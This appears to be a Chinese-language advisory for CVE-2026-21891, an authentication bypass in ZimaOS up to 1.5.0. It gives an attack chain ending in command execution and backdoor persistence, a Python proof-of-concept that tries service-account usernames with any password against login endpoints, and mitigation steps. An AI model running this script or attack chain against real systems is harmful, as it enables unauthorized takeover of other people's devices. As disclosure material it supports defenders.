CVE-2026-21891: ZimaOS 认证绕过漏洞（CVSS 9.4）

漏洞信息

漏洞编号

CVE-2026-21891

漏洞类型

认证绕过

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ZimaOS（ CasaOS分支）

漏洞概述

ZimaOS是一款基于CasaOS的操作系统，专为Zima设备和x86-64系统设计。在ZimaOS 1.5.0及之前版本中存在严重的认证绕过漏洞。该漏洞源于应用程序在验证用户身份时，对特定系统服务账户的用户名验证通过后，错误地跳过或未能正确处理密码验证流程。攻击者只需知道系统中存在的服务账户名称，使用任意密码即可成功登录系统，获得完整的认证访问权限。由于该漏洞影响登录认证这一核心安全机制，攻击者可利用此漏洞完全接管系统，执行任意操作。截至漏洞披露时，官方尚未发布修复版本。

技术细节

ZimaOS 1.5.0及之前版本在实现用户登录功能时存在逻辑缺陷。当用户提交登录请求时，系统首先检查用户名是否存在于系统账户列表中。对于普通用户账户，系统会正常执行后续的密码验证流程。然而，当用户名匹配到预设的系统服务账户（如admin、root、system等常见服务账户）时，代码逻辑出现异常：系统可能在密码验证前就返回了认证成功的状态，或者密码验证函数返回的错误结果被错误处理，导致验证失败被当作成功处理。攻击者只需构造一个包含已知服务账户用户名的登录请求，密码字段可填写任意值，即可绕过完整的身份认证流程。此漏洞的危险之处在于它完全绕过了密码保护机制，使得任何人都可以以系统服务账户权限访问整个ZimaOS系统。

攻击链分析

STEP 1

步骤1

信息收集：识别目标系统是否运行ZimaOS，确认版本号（需<=1.5.0）

STEP 2

步骤2

枚举服务账户：收集ZimaOS系统中常见的系统服务账户名称（如admin、root、system等）

STEP 3

步骤3

构造登录请求：向ZimaOS的登录API端点（如/api/v1/user/login）发送包含服务账户用户名和任意密码的POST请求

STEP 4

步骤4

绕过认证：由于密码验证逻辑缺陷，系统返回认证成功响应，包含session token或JWT

STEP 5

步骤5

会话劫持：使用获取的认证凭证访问系统API，执行特权操作如文件读写、系统配置修改、命令执行等

STEP 6

步骤6

持久化控制：创建后门账户、修改认证配置或植入恶意脚本，实现长期系统控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-21891 PoC - ZimaOS Authentication Bypass
# Target: ZimaOS <= 1.5.0

TARGET_URL = "http://target-ip:3000"  # Replace with actual target

def exploit_auth_bypass():
    """
    Exploit authentication bypass in ZimaOS login function.
    The vulnerability allows bypass by using known service account usernames.
    """
    endpoints = [
        "/api/v1/user/login",
        "/api/v2/user/login",
        "/login"
    ]
    
    # Common service account usernames to try
    service_accounts = ["admin", "root", "system", "daemon", "service", "zima"]
    
    for endpoint in endpoints:
        for username in service_accounts:
            payload = {
                "username": username,
                "password": "any_password_here"  # Any password works due to bug
            }
            
            try:
                response = requests.post(
                    f"{TARGET_URL}{endpoint}",
                    json=payload,
                    timeout=10,
                    verify=False
                )
                
                # Check for successful authentication indicators
                if response.status_code == 200:
                    data = response.json()
                    if data.get("success") or data.get("token") or data.get("session"):
                        print(f"[+] VULNERABLE! Auth bypassed with username: {username}")
                        print(f"[+] Response: {json.dumps(data, indent=2)}")
                        return True, username, data
                
                # Check for other success indicators
                if "token" in response.text.lower() or "session" in response.text.lower():
                    if response.status_code in [200, 201, 204]:
                        print(f"[!] Potential auth bypass with username: {username}")
                        
            except requests.exceptions.RequestException as e:
                print(f"[-] Error testing {username}@{endpoint}: {e}")
    
    return False, None, None

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-21891 - ZimaOS Authentication Bypass PoC")
    print("=" * 60)
    vulnerable, user, resp = exploit_auth_bypass()
    if vulnerable:
        print(f"\n[SUCCESS] System is vulnerable!")
        print(f"Use username '{user}' with any password to authenticate")

影响范围

ZimaOS <= 1.5.0

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：(1) 使用网络ACL限制对ZimaOS管理界面的访问，仅允许受信任的IP地址访问；(2) 禁用非必要的系统服务账户或重命名默认账户名称；(3) 监控登录日志，关注使用异常用户名的登录尝试；(4) 考虑使用VPN或跳板机进行安全的远程访问；(5) 如果业务允许，可暂时关闭ZimaOS的远程访问功能。